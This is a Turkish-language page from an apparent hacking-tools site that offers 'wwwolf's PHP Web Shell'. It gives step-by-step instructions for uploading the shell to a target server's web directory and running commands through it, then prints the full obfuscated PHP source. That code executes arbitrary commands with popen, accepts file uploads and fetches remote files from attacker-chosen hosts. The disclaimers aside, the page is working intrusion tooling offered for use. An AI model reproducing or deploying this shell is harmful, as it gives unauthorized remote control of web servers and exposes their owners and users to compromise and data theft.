Web Shell

wwwolf’s PHP Web Shell

R00T Admin Şubat 18, 2025 38 Görüntüleme Şimdi İndir
wwwolf’s PHP Web Shell
wwwolf’s PHP Web Shell

wwwolf’s PHP Web Shell

wwwolf’s PHP web shell, çeşitli web shell araçlarında karşılaşılan sorunları çözmek amacıyla geliştirilmiş hafif ve güvenilir bir PHP betiğidir. Bu araç, hedef sisteme ilk erişimi sağlamak için tasarlanmış olup, kullanıcı dostu ve esnek bir yapıya sahiptir.

Özellikler

  • Şifre korumalı erişim imkanı.
  • UNIX ve Windows sistemleriyle uyumlu, ek bir değişiklik gerektirmez.
  • PHP çıktı tamponunu temizleyerek stabil ve temiz bir çalışma sağlar.
  • Form verilerini POST isteğiyle göndererek, URL’de değişiklik yapmadan çalışır.
  • Varsayılan olarak mevcut çalışma dizinini kullanır ve bu sayede sistem türünü kolayca belirlemenize olanak tanır.
  • Dosya yükleme ve uzaktan dosya çekme gibi ek özellikler sunar.
  • JavaScript kullanmadan komut giriş alanını hızlıca temizleme imkanı.

Kurulum ve Kullanım

Uyarı: Bu araç yalnızca güvenlik araştırmaları ve değerlendirmeleri için geliştirilmiştir. Yasal olmayan amaçlar için kullanılması kesinlikle yasaktır!

1. Adım: Betiğin İndirilmesi

Betiği GitHub deposundan indirebilirsiniz:

https://raw.githubusercontent.com/RootShelll/wwwolf-php-webshell/refs/heads/main/wwwolf-php-webshell.php

2. Adım: Sunucuya Yükleme

İndirdiğiniz webshell.php dosyasını hedef sunucunun web dizinine yükleyin. Örneğin:

/var/www/html/webshell.php

3. Adım: Web Tarayıcısı ile Erişim

Tarayıcınızı açarak aşağıdaki gibi betiğe erişin:

http://hedefsite.com/webshell.php

4. Adım: Şifre Koruması (Opsiyonel)

Betiği açtığınızda, eğer şifre koruması etkinleştirilmişse, sizden bir şifre girmeniz istenecektir. Varsayılan şifreyi değiştirmek için betik dosyasını açın ve aşağıdaki satırı bulun:

$password = 'varsayilan_sifre';

Buradaki 'varsayilan_sifre' ifadesini kendi belirlediğiniz güçlü bir şifre ile değiştirin ve dosyayı kaydedin.

5. Adım: Komut Çalıştırma

Betiğe eriştikten sonra, komut giriş alanına çalıştırmak istediğiniz komutu yazın ve “Gönder” butonuna tıklayın. Örneğin:

whoami

Bu komut, mevcut kullanıcı adını gösterecektir.

6. Adım: Dosya Yükleme

Betiğin dosya yükleme özelliğini kullanarak hedef sunucuya dosya yükleyebilirsiniz:

  • Yerel Dosya Yükleme: “Dosya Seç” butonuna tıklayarak bilgisayarınızdan bir dosya seçin ve “Yükle” butonuna basın.
  • Uzaktan Dosya Çekme: “Uzak Dosya URL’si” alanına dosyanın URL’sini girin ve “Getir” butonuna tıklayın.

7. Adım: Çalışma Dizinini Değiştirme

Mevcut çalışma dizinini değiştirmek için “Çalışma Dizinini Değiştir” alanına yeni dizin yolunu girin ve “Değiştir” butonuna tıklayın. Örneğin:

/var/www/html/yeni_dizin

Güvenlik ve Yasal Uyarı

Önemli: Bu betik yalnızca güvenlik araştırmaları ve değerlendirmeleri amacıyla geliştirilmiştir. Yasal olmayan veya yetkisiz sistemlere erişim için kullanılması yasaktır ve ciddi yasal sonuçlara yol açabilir. Lütfen bu aracı yalnızca izinli ve etik amaçlar için kullanın.

Kaynaklar

Sonuç

wwwolf’s PHP Web Shell, web sunucularında komut çalıştırmak ve temel sistem yönetimi işlemleri yapmak için geliştirilmiş, kullanımı kolay ve esnek bir araçtır. Ancak, bu aracın yalnızca güvenlik testleri ve etik amaçlarla kullanılması gerektiğini unutmayın. Yetkisiz sistemlere erişim etik dışıdır ve yasalar çerçevesinde suç teşkil edebilir.

İpucu: Betiği daha güvenli hale getirmek için IP kısıtlaması ekleyebilir, parola korumasını daha güçlü hale getirebilir veya htaccess ile erişimi sınırlandırabilirsiniz.
Php 
<?php
/*   _________________________________________________________________________________
    |  Project: R00t-Shell.com - Php Obfuscator  2.0.15                               |
    |  Author: R00t Shell                                                             |
    |  Date: 2025-02-18 06:45:35                                                      |
    |  Website: https://r00t-shell.com                                                |
    |  Virus Total: 9581b13240796fbd9089c35ea1589289aa2a5a130510167244600f2fd59b0df9  |
    |  Description: Obfuscates PHP code to increase security and protect source code. |
    |_________________________________________________________________________________|
*/
 goto w2a1u; W8AxS: global $Iupwe, $LAzqL, $su8HJ; goto xYrM9; oENm7: $_SERVER =& $su8HJ; goto aNLGG; i8OMQ: $ND2EE = empty($_POST["\x70\141\x73\x73"]) ? '' : $_POST["\x70\x61\163\163"]; goto FWIrz; GenQp: $rCGkq = getcwd(); goto NYlVc; lNcyO: $QjWOi = empty($_POST["\146\145\164\x63\150\137\160\157\x72\x74"]) ? "\70\60" : $_POST["\146\145\164\x63\150\x5f\x70\157\162\x74"]; goto i8OMQ; B70oX: error_reporting(E_ALL); goto VIfsU; wsUBY: if (empty($UAg0I)) { goto bUhe6; } goto yWIKl; fYEbu: $njhFl = empty($_POST["\143\155\x64"]) ? '' : $_POST["\143\155\x64"]; goto U__G0; gsGPT: JB1IY: goto L8fjQ; eMC16: echo "\42\76\xd\12\x9\11\11\11\x9"; goto Mm5HS; oG4CI: $KN0pz = $rCGkq . DIRECTORY_SEPARATOR . basename($l8c8s); goto Uo9sS; PFPlK: $b8b9g = "\46\x23\71\67\x38\65\x3b\x20\72"; goto ECSZ7; ECSZ7: if (empty($UAg0I)) { goto Uxpz_; } goto TkaFO; Tf5W9: echo "\74\142\76"; goto F6FxQ; m0R3U: goto a1EAG; goto LWHPd; HJNZs: if (!@ob_end_clean()) { goto TnKfL; } goto y_BGn; mobx6: slMSQ: goto GZZK2; xYrM9: $_FILES =& $Iupwe; goto RNB6N; zgx8i: if (empty($njhFl)) { goto KTMIp; } goto Tf5W9; hEshI: @flush(); goto LfDjx; l3fXP: Xx_D3: goto zog09; bACSQ: LqKIb: goto gXcQu; WhKDV: if (ini_get("\141\154\154\x6f\167\137\x75\162\154\137\x66\x6f\x70\x65\156")) { goto gLc31; } goto E7WSv; TkaFO: if (function_exists("\150\141\x73\x68\137\150\x6d\141\x63") || function_exists("\x6d\150\141\163\x68")) { goto LqKIb; } goto mvW70; C8f_4: echo "\x9\11\11\11\x3c\146\x6f\x72\155\x20\x6d\x65\x74\x68\157\144\75\42\160\157\163\164\42\40\x61\143\164\x69\x6f\156\75\42"; goto c_JDO; u5IOa: $sCqbj .= "{$WLdXx}\x20\x46\x69\x6c\145\x20\x66\x65\x74\x63\150\151\156\x67\x20\x64\151\163\x61\142\x6c\x65\x64\40\x28\47\x61\x6c\154\x6f\x77\137\165\x72\154\137\146\x6f\x70\145\x6e\x27" . "\40\x64\151\163\141\142\x6c\145\x64\40\x61\x6e\144\40\x27\163\x74\162\145\141\x6d\x5f\163\145\x6c\x65\x63\164\50\51\47\40\155\151\163\x73\151\156\147\51\x2e\74\x62\162\x20\x2f\x3e"; goto ZZ5kI; t2dnj: if (!(ini_get("\157\x70\145\x6e\137\x62\141\x73\x65\144\151\162") && !ini_set("\x6f\x70\145\x6e\x5f\142\x61\x73\x65\x64\151\x72", ''))) { goto eCjta; } goto T5TYH; yWIKl: echo "\x9\x9\x3c\151\156\x70\165\x74\40\164\171\160\x65\75\42\x68\x69\144\x64\x65\x6e\42\40\x6e\x61\155\x65\75\42\x61\x75\x74\150\42\40\166\141\x6c\x75\145\75\x22"; goto KQ3Wf; PNxD1: $YTRzu = $rCGkq . DIRECTORY_SEPARATOR . basename($_FILES["\x75\160\x6c\x6f\141\144"]["\x6e\141\155\x65"]); goto VALaN; GZZK2: $fSDY1 = "\x66\x65\164\x63\150\137\x73\x6f\143\x6b"; goto ZxzGb; F6FxQ: D4cZ2($njhFl); goto sW7hi; EI701: echo "\11\76\xd\xa\11"; goto wsUBY; sW7hi: echo "\x3c\57\142\76\12"; goto SolZE; NYlVc: p7Wux: goto rVrwE; eMo62: function E63tO($zNLFn, $heirI, $xVZ7h, $KN0pz) { goto WW6oF; tLC69: p4xVW: goto JbeXu; tCIAD: PCini: goto ntrFp; nDE9e: if ($ZPPNE !== false) { goto DRKrS; } goto fqCFU; ZitRV: $VSHmX .= "{$b8b9g}\x20\106\x61\x69\x6c\x65\144\x20\164\157\40\157\x70\145\x6e\40\146\151\x6c\145\x20\74\x69\x3e{$KN0pz}\x3c\57\x69\x3e\74\142\162\40\57\x3e"; goto yJpNY; DmELM: if (strpos($zNLFn, "\x3a\57\57") === false) { goto UnfGW; } goto WHG2G; ntrFp: if (feof($ZPPNE)) { goto aL5xp; } goto OQ15h; fqCFU: $VSHmX = "{$b8b9g}\x20\106\x61\x69\154\x65\144\40\x74\x6f\x20\157\x70\x65\x6e\x20\125\122\114\x20\74\x69\76{$zNLFn}\72{$heirI}{$xVZ7h}\x3c\x2f\x69\76\x3c\x62\162\x20\57\76"; goto FP89g; pr_RP: DRKrS: goto Gde_G; YrDBx: $VSHmX .= "{$O37g8}\x20\x46\145\164\x63\150\x65\x64\40\x66\x69\x6c\145\x20\74\151\x3e{$KN0pz}\x3c\57\151\x3e\40\x28{$hLIKL}\40\142\x79\x74\145\163\51\74\142\x72\x20\57\76"; goto vhAiq; fY378: if ($wVZw9 !== false) { goto p4xVW; } goto ZitRV; OQ15h: $hLIKL += fwrite($wVZw9, fread($ZPPNE, 1024)); goto f23HM; JbeXu: $hLIKL = 0; goto tCIAD; EvFnC: fjq3R: goto o1Z9U; MXnLv: $zNLFn = "\x68\164\x74\160\72\57\x2f" . $zNLFn; goto EvFnC; jmbM3: $VSHmX = ''; goto DmELM; BwvmC: return $VSHmX; goto jEyO0; FP89g: goto hWa72; goto pr_RP; vrNYG: fclose($wVZw9); goto YrDBx; yJpNY: goto fNWL3; goto tLC69; y14H0: goto fjq3R; goto E4TBN; nQiku: fclose($ZPPNE); goto kD13O; o1Z9U: $ZPPNE = fopen("{$zNLFn}\72{$heirI}{$xVZ7h}", "\162\142"); goto nDE9e; WW6oF: global $b8b9g, $O37g8; goto jmbM3; Gde_G: $wVZw9 = fopen($KN0pz, "\167\x62"); goto fY378; WHG2G: $zNLFn = str_replace(array("\163\163\154\x3a\57\57", "\x74\x6c\x73\x3a\57\x2f"), "\150\x74\164\160\x73\x3a\x2f\57", $zNLFn); goto y14H0; E4TBN: UnfGW: goto MXnLv; vhAiq: fNWL3: goto nQiku; EtcYE: aL5xp: goto vrNYG; kD13O: hWa72: goto BwvmC; f23HM: goto PCini; goto EtcYE; jEyO0: } goto TPM9s; aV9j5: if (!(PBbL0($ih0yU) !== $UAg0I)) { goto LCUaM; } goto C8f_4; grR3A: if (!ini_get("\146\151\x6c\145\x5f\165\160\154\157\x61\x64\x73")) { goto F9rX7; } goto cMORo; MpfX4: IuL03: goto tdUQ2; yUgoy: qIfMP: goto ozJFV; T3wfI: if (chdir($rCGkq)) { goto p7Wux; } goto GenQp; XmRRc: goto j6AKd; goto bACSQ; sRDjX: echo "\x22\x3e\15\12\x9\11\x9\11\160\157\x72\164\x3a\40\74\151\x6e\160\x75\x74\40\x74\x79\x70\145\x3d\x22\164\145\x78\x74\x22\x20\163\151\172\145\x3d\x22\x34\42\x20\x69\x64\x3d\x22\146\145\164\x63\x68\137\x70\x6f\x72\164\42\x20\x6e\x61\x6d\x65\75\42\146\x65\164\x63\x68\x5f\x70\157\x72\164\x22\x20\166\x61\x6c\165\145\x3d\42"; goto CxCOF; TiVF2: TnKfL: goto ATgUy; fc7MQ: $rkbX5 = popen("\143\x6d\144\40\57\x43\40\x22" . $njhFl . "\x22\40\62\x3e\x26\61", "\162"); goto m0R3U; ATgUy: if (isset($_SERVER)) { goto GvPJ8; } goto W8AxS; PJ_11: $FVqiS = empty($_POST["\x66\145\164\x63\x68\137\x68\157\x73\164"]) ? $_SERVER["\122\105\115\x4f\124\105\137\101\x44\x44\x52"] : $_POST["\146\145\x74\143\x68\x5f\150\x6f\163\x74"]; goto eHn2h; ZxzGb: mWdbW: goto JsEQh; ozJFV: KTMIp: goto xRTqR; MeIsy: ZvHMK: goto ji0JX; El7Jz: $WLdXx = "\46\43\71\x38\70\x38\x3b\x20\72"; goto PFPlK; lrjdf: echo "\74\160\162\x65\x3e"; goto zgx8i; SolZE: if (DIRECTORY_SEPARATOR == "\57") { goto nvLP3; } goto fc7MQ; G0vEk: $fSDY1 = ''; goto u5IOa; QAx2s: echo "\11\11\11\x9\11\74\x69\156\160\165\x74\x20\x74\171\x70\145\75\x22\160\x61\x73\x73\167\157\162\x64\x22\40\163\151\172\145\x3d\42\x31\65\42\40\156\x61\155\x65\x3d\x22\160\141\163\x73\x22\x3e\15\xa\11\11\x9\x9\11\x3c\151\156\x70\x75\164\x20\x74\x79\x70\145\75\x22\x73\x75\142\x6d\x69\x74\42\40\166\x61\154\x75\x65\75\42\123\x65\156\144\42\x3e\15\12\x9\x9\x9\11\x3c\57\x66\x6f\x72\155\x3e\15\12\x9\11\11"; goto mnLTq; hJW4h: echo "\42\76\15\xa\x9\11\x9\x9\160\141\x74\150\72\x20\74\x69\x6e\160\165\x74\x20\164\171\160\x65\x3d\42\x74\145\x78\x74\42\40\x73\x69\x7a\145\75\42\x34\60\x22\40\151\x64\75\x22\x66\145\164\143\150\x5f\x70\x61\164\150\42\40\x6e\141\155\x65\75\x22\146\145\x74\x63\150\x5f\160\x61\164\150\42\x20\166\x61\154\x75\x65\x3d\42\42\x3e\15\12\11\x9\11\x3c\57\x74\x64\x3e\74\x2f\x74\162\x3e\15\xa\11\x9"; goto gsGPT; QqXfA: F9rX7: goto OJ0QZ; Xr14_: D4CZ2($QJlWV); goto R9rqV; d6tRR: $fSDY1 = "\146\x65\164\x63\150\137\x66\x6f\160\x65\x6e"; goto PJ_11; Uo9sS: $sCqbj .= $fSDY1($FVqiS, $QjWOi, $l8c8s, $KN0pz); goto l3fXP; rwDlR: Uxpz_: goto wn_Bw; CqKml: nmYbz: goto t2dnj; GK8PB: ini_set("\144\151\163\x70\x6c\x61\x79\x5f\x65\x72\x72\x6f\162\x73", "\61"); goto B70oX; aNLGG: GvPJ8: goto IKX4B; ll3ji: echo "\xd\xa\74\x66\157\162\x6d\40\155\145\164\x68\x6f\144\x3d\x22\x70\157\x73\164\x22\40\x61\x63\x74\x69\157\x6e\75\42"; goto Xr14_; odj2U: echo "\x9\x3c\164\141\142\x6c\145\40\x62\x6f\162\144\x65\x72\75\42\60\42\76\xd\xa\11\x9"; goto waS6i; mvW70: $sCqbj .= "{$WLdXx}\x20\x41\x75\x74\150\x65\x6e\x74\151\143\141\164\x69\157\x6e\x20\144\151\x73\x61\142\x6c\x65\x64\40\50\47\155\x68\x61\163\150\x28\x29\47\40\155\x69\x73\x73\x69\x6e\147\51\x2e\x3c\142\162\40\x2f\76"; goto XmRRc; t5llY: echo "\x3c\160\x3e{$sCqbj}\74\57\160\76"; goto vc2FJ; w2a1u: $BGGzk = ''; goto GpXBG; TPM9s: function BLrbs($zNLFn, $heirI, $xVZ7h, $KN0pz) { goto UsFBa; cN7oR: $L1zcR = ''; goto puIvH; mtDms: fclose($K9NhA); goto elrIL; YT1xp: $NkqVS = NULL; goto hZ5C2; kCgQs: Y2ai9: goto cN7oR; U84Ip: $VSHmX = ''; goto Se276; elrIL: $VSHmX .= "{$O37g8}\x20\x46\145\x74\143\x68\145\x64\40\x66\151\x6c\145\40\x3c\x69\76{$KN0pz}\74\57\x69\76\x20\50" . strlen($L1zcR) . "\40\142\x79\164\145\x73\51\74\142\162\40\x2f\x3e"; goto NxjZc; L6T1j: m_Qg6: goto lIX0s; uE6Dh: Lz5VZ: goto skt6_; ZTtlk: $VSHmX .= "{$b8b9g}\x20\x46\141\x69\x6c\145\144\40\164\x6f\x20\157\160\145\x6e\x20\146\x69\154\x65\x20\x3c\151\x3e{$KN0pz}\74\x2f\x69\x3e\74\142\162\40\57\x3e"; goto ygov5; PpdEf: return $VSHmX; goto aTQ13; hZ5C2: $ft9dz = NULL; goto dqpBD; UsFBa: global $b8b9g, $O37g8; goto U84Ip; ygov5: goto HN4Pj; goto kCgQs; XuoAz: goto Gp_TU; goto L6T1j; Z14fd: yZ7iO: goto PpdEf; O_E1N: $A5oyf = fsockopen($zNLFn, $heirI); goto x1C6Z; AcmDy: if (!(stream_select($LHkKf, $NkqVS, $ft9dz, 5) && !feof($A5oyf))) { goto m_Qg6; } goto EPJLH; EPJLH: $L1zcR .= fread($A5oyf, 1024); goto XuoAz; BikyS: Gp_TU: goto AcmDy; x1C6Z: if ($A5oyf) { goto Lz5VZ; } goto BvXM3; lIX0s: $L1zcR = substr($L1zcR, strpos($L1zcR, "\15\12\xd\12") + 4); goto KxpfR; Se276: $zNLFn = str_replace("\x68\164\x74\x70\163\x3a\x2f\x2f", "\164\x6c\x73\72\x2f\57", $zNLFn); goto O_E1N; x3Ymh: fclose($A5oyf); goto Z14fd; GzbzH: goto yZ7iO; goto uE6Dh; skt6_: $K9NhA = fopen($KN0pz, "\167\x62"); goto T37B_; puIvH: $LHkKf = array($A5oyf); goto YT1xp; dqpBD: fwrite($A5oyf, "\x47\105\x54\40{$xVZ7h}\x20\110\124\124\120\x2f\61\x2e\60\15\xa\xd\xa"); goto BikyS; T37B_: if ($K9NhA) { goto Y2ai9; } goto ZTtlk; BvXM3: $VSHmX .= "{$b8b9g}\40\x46\141\151\154\145\x64\x20\164\157\x20\143\157\x6e\156\145\143\x74\x20\x74\x6f\40\x3c\x69\76{$zNLFn}\72{$heirI}\74\57\151\76\74\142\162\40\57\76"; goto GzbzH; KxpfR: fwrite($K9NhA, $L1zcR); goto mtDms; NxjZc: HN4Pj: goto x3Ymh; aTQ13: } goto bcrqw; rVrwE: if (!(!empty($fSDY1) && !empty($l8c8s))) { goto Xx_D3; } goto oG4CI; ji0JX: hUzop: goto ll3ji; eHn2h: $l8c8s = empty($_POST["\146\145\x74\143\x68\137\160\x61\164\150"]) ? '' : $_POST["\146\x65\164\143\x68\x5f\160\141\164\150"]; goto lNcyO; cMORo: echo "\x9\x9\11\x9\x3c\x62\76\x55\160\154\157\141\144\72\x3c\x2f\142\x3e\40\74\x69\x6e\x70\165\x74\40\x74\x79\x70\145\75\x22\146\151\x6c\145\42\40\151\144\75\42\x75\160\154\157\x61\x64\42\x20\x6e\x61\155\x65\x3d\42\165\160\x6c\157\141\144\x22\x3e\15\12\x9\x9\11"; goto QqXfA; tCxAK: $sCqbj = ''; goto eOYxT; X0Y1d: $sCqbj .= "{$O37g8}\x20\x55\160\154\x6f\141\x64\x65\144\x20\146\x69\x6c\145\x20\x3c\151\76{$YTRzu}\x3c\57\x69\76\40\x28" . $_FILES["\165\160\x6c\157\141\144"]["\163\x69\172\145"] . "\x20\x62\x79\164\x65\x73\x29\74\142\x72\x20\x2f\76"; goto MeIsy; P08c7: echo "\x22\x3e\15\12\x9\x9\74\57\164\x64\x3e\74\x2f\164\162\76\15\xa\x9\x9\74\x74\x72\76\x3c\x74\144\76\15\xa\11\x9\x3c\57\164\x64\x3e\74\164\144\76\xd\xa\11\11\x9\x3c\163\x75\160\76\74\x61\40\x68\162\x65\146\x3d\42\43\42\40\x6f\156\x63\154\x69\x63\x6b\x3d\42\143\155\144\56\166\x61\154\x75\x65\75\47\x27\x3b\x20\x63\155\144\56\x66\157\143\165\163\x28\x29\x3b\40\x72\145\164\165\162\156\x20\x66\x61\x6c\x73\x65\x3b\42\76\103\154\145\x61\x72\40\x63\155\x64\x3c\57\141\x3e\x3c\x2f\x73\165\160\x3e\xd\12\11\11\x3c\57\164\144\76\74\x2f\164\x72\76\xd\12\x9\11\74\x74\x72\76\74\x74\144\x20\143\157\154\x73\x70\x61\156\x3d\42\x32\42\40\x73\x74\171\154\145\x3d\42\164\145\x78\x74\x2d\141\154\151\147\x6e\72\40\x63\145\156\x74\145\x72\73\42\x3e\15\xa\x9\x9\x9\74\x69\156\160\165\164\x20\164\171\x70\x65\x3d\42\x73\165\x62\155\x69\x74\x22\40\x76\x61\154\x75\x65\x3d\x22\105\170\145\x63\165\164\x65\x22\40\x73\164\x79\x6c\x65\75\42\164\145\170\x74\x2d\141\154\151\147\156\x3a\40\x72\151\x67\150\x74\x3b\42\76\15\12\11\11\x3c\x2f\x74\144\76\x3c\57\x74\x72\x3e\15\xa\x9\74\x2f\164\141\142\x6c\145\76\xd\12\11\xd\xa\74\57\x66\157\x72\x6d\76\xd\12\74\x68\162\40\57\x3e\15\xa\15\12"; goto rJZh2; d58dX: ini_set("\141\x6c\154\x6f\167\x5f\165\162\x6c\x5f\146\x6f\x70\x65\156", "\61"); goto WhKDV; T5TYH: $sCqbj .= "{$WLdXx}\40\157\160\x65\156\137\142\141\x73\x65\144\151\x72\x20\75\40" . ini_get("\157\x70\145\156\137\x62\x61\163\145\144\151\x72") . "\74\x62\x72\40\57\76"; goto dmuEs; Mm5HS: D4cZ2($BGGzk); goto QAx2s; gpYIb: echo "\x9\11\x65\x6e\x63\164\x79\x70\x65\x3d\x22\x6d\165\154\x74\x69\x70\141\x72\x74\57\146\x6f\162\155\55\144\x61\x74\x61\x22\15\xa\x9"; goto zHp8u; mnLTq: exit; goto SVJEI; IKX4B: $ih0yU = ''; goto fYEbu; lNmL2: function pBbl0($A5oyf) { goto DxH1Z; PeDUE: if (function_exists("\150\x61\x73\150\x5f\x68\x6d\141\143")) { goto FvA9C; } goto D268b; uhVyS: goto miNp0; goto coPQH; vBbmt: return hash_hmac("\x73\150\x61\x32\x35\66", $A5oyf, $BGGzk); goto kqT9y; coPQH: FvA9C: goto vBbmt; D268b: return bin2hex(mhash(MHASH_SHA256, $A5oyf, $BGGzk)); goto uhVyS; kqT9y: miNp0: goto b1prA; DxH1Z: global $BGGzk; goto PeDUE; b1prA: } goto eMo62; waS6i: if (empty($fSDY1)) { goto JB1IY; } goto thje6; xKCx7: a1EAG: goto KnnnJ; JsEQh: gLc31: goto MpfX4; SVJEI: LCUaM: goto GINyy; GpXBG: $UAg0I = ''; goto uYeXN; xRTqR: echo "\74\x2f\x70\162\x65\x3e"; goto ryZai; VALaN: if (!move_uploaded_file($_FILES["\165\160\x6c\157\x61\144"]["\x74\x6d\160\137\x6e\x61\155\x65"], $YTRzu)) { goto ZvHMK; } goto X0Y1d; dmuEs: eCjta: goto T3wfI; zog09: if (!(ini_get("\146\151\x6c\145\x5f\x75\160\x6c\x6f\141\144\163") && !empty($_FILES["\x75\x70\154\x6f\x61\144"]))) { goto hUzop; } goto PNxD1; iw7CW: $rkbX5 = popen("\145\170\x65\143\x20\62\76\x26\x31\73\40" . $njhFl, "\x72"); goto xKCx7; bcrqw: ini_set("\x6c\157\147\x5f\x65\162\x72\x6f\x72\163", "\x30"); goto GK8PB; KnnnJ: QIZ8x: goto hcF43; ZZ5kI: goto mWdbW; goto mobx6; Or_Pd: D4Cz2($njhFl); goto P08c7; L8fjQ: echo "\11\11\x3c\x74\x72\76\x3c\164\144\x3e\15\12\11\x9\x9\74\142\x3e\x43\127\104\72\74\x2f\x62\x3e\15\12\x9\11\74\x2f\x74\144\x3e\74\164\x64\76\15\12\x9\11\11\x3c\x69\x6e\x70\165\x74\40\164\171\160\x65\x3d\x22\164\x65\170\x74\x22\40\163\x69\172\x65\x3d\x22\65\60\42\x20\x69\144\75\x22\x63\x77\144\42\x20\156\141\x6d\145\75\42\143\167\x64\x22\x20\166\x61\x6c\x75\x65\75\x22"; goto PIQX6; zzA4E: bUhe6: goto odj2U; SEM4r: ini_set("\x66\151\x6c\x65\137\165\160\154\x6f\141\x64\163", "\x31"); goto av9rp; OJ0QZ: echo "\11\x9\74\57\164\144\76\x3c\57\164\162\x3e\15\12\x9\11\74\x74\x72\76\74\x74\x64\76\15\12\11\11\11\x3c\x62\76\103\x6d\144\x3a\74\57\142\76\xd\xa\11\x9\x3c\x2f\164\144\76\x3c\x74\144\76\15\xa\11\11\11\x3c\151\x6e\160\x75\164\40\164\171\x70\145\x3d\42\164\x65\170\x74\x22\x20\x73\151\172\145\75\x22\x38\x30\x22\x20\x69\144\x3d\42\143\x6d\x64\x22\x20\x6e\141\155\145\x3d\42\x63\155\144\x22\x20\166\141\154\165\145\x3d\x22"; goto Or_Pd; IUWzb: d4Cz2($FVqiS); goto sRDjX; vc2FJ: c75em: goto lrjdf; LfDjx: goto QIZ8x; goto yUgoy; eOYxT: $O37g8 = "\46\43\x39\67\x38\66\x3b\40\x3a"; goto El7Jz; FWIrz: $QJlWV = $_SERVER["\x52\105\x51\x55\105\123\x54\x5f\x55\x52\111"]; goto tCxAK; R9rqV: echo "\x22\xd\12\11"; goto WKcLR; E7WSv: if (function_exists("\x73\x74\x72\145\x61\x6d\137\163\x65\x6c\x65\143\164")) { goto slMSQ; } goto G0vEk; TBx_Q: echo "\x22\76\xd\12\x9"; goto zzA4E; HHSYm: echo htmlspecialchars(fread($rkbX5, 4096), ENT_QUOTES); goto hEshI; av9rp: if (ini_get("\146\x69\154\145\x5f\x75\160\x6c\x6f\141\144\163")) { goto VtcWz; } goto qW6n6; WKcLR: if (!ini_get("\146\151\154\x65\137\165\160\154\x6f\x61\144\x73")) { goto Kdq5X; } goto gpYIb; rJZh2: if (empty($sCqbj)) { goto c75em; } goto t5llY; hcF43: if (feof($rkbX5)) { goto qIfMP; } goto HHSYm; RNB6N: $_POST =& $LAzqL; goto oENm7; KQ3Wf: d4Cz2($ih0yU); goto TBx_Q; c_JDO: d4cz2($QJlWV); goto eMC16; U__G0: $rCGkq = empty($_POST["\143\x77\144"]) ? getcwd() : $_POST["\x63\167\x64"]; goto d6tRR; thje6: echo "\11\11\11\x3c\164\x72\76\74\164\144\76\xd\xa\x9\11\x9\11\74\142\76\x46\x65\x74\x63\x68\x3a\74\x2f\x62\x3e\xd\12\11\x9\x9\x3c\x2f\x74\x64\x3e\x3c\164\x64\x3e\15\xa\11\x9\x9\x9\150\x6f\163\164\72\x20\74\151\x6e\160\165\x74\40\164\171\160\145\x3d\x22\x74\145\170\x74\x22\x20\x73\151\172\145\x3d\42\x31\x35\x22\40\x69\144\x3d\42\146\145\164\143\150\x5f\x68\157\163\x74\42\x20\156\x61\x6d\145\75\x22\x66\x65\x74\143\150\x5f\150\x6f\163\164\42\x20\166\141\154\x75\x65\x3d\42"; goto IUWzb; tdUQ2: if (ini_get("\146\151\154\x65\137\165\160\154\157\x61\x64\x73")) { goto nmYbz; } goto SEM4r; zHp8u: Kdq5X: goto EI701; GINyy: j6AKd: goto rwDlR; wn_Bw: if (ini_get("\x61\154\154\x6f\x77\137\165\162\x6c\137\146\157\160\145\x6e")) { goto IuL03; } goto d58dX; VIfsU: dsXcb: goto HJNZs; CxCOF: D4cZ2($QjWOi); goto hJW4h; NIstY: echo "\x22\x3e\xd\xa\11\11\x9"; goto grR3A; qW6n6: $sCqbj .= "{$WLdXx}\x20\106\x69\x6c\x65\x20\x75\x70\x6c\157\x61\144\163\40\x64\x69\163\141\142\154\x65\x64\56\x3c\142\162\40\x2f\x3e"; goto riGIi; uYeXN: function D4CZ2($A5oyf) { echo htmlspecialchars($A5oyf, ENT_QUOTES); } goto lNmL2; riGIi: VtcWz: goto CqKml; gXcQu: $ih0yU = empty($_POST["\141\x75\x74\150"]) ? PBBl0($ND2EE) : $_POST["\141\x75\x74\x68"]; goto aV9j5; LWHPd: nvLP3: goto iw7CW; PIQX6: d4Cz2($rCGkq); goto NIstY; y_BGn: goto dsXcb; goto TiVF2; ryZai: exit;
Uyarı: Bu sitede paylaşılan içerikler yalnızca bilgilendirme ve eğitim amaçlıdır. Paylaşımın kullanımından doğabilecek her türlü sorumluluk tamamen kullanıcıya aittir. Site yönetimi içeriğin kötüye kullanımından sorumlu değildir.
#etik hacker#PHP betiği#PHP Web Shell#shell script#siber güvenlik#sistem güvenliği#web shell kullanımı#wwwolf
R00t-Shell

R00T Admin

Sizin için en kaliteli php shell dosyalarını ve hack araçlarını derleyip sunmaktan mutluluk duyuyoruz.
Paylaşımlarımızı beğeniyorsanız, lütfen bizi arkadaşlarınıza tavsiye edin ve paylaşın.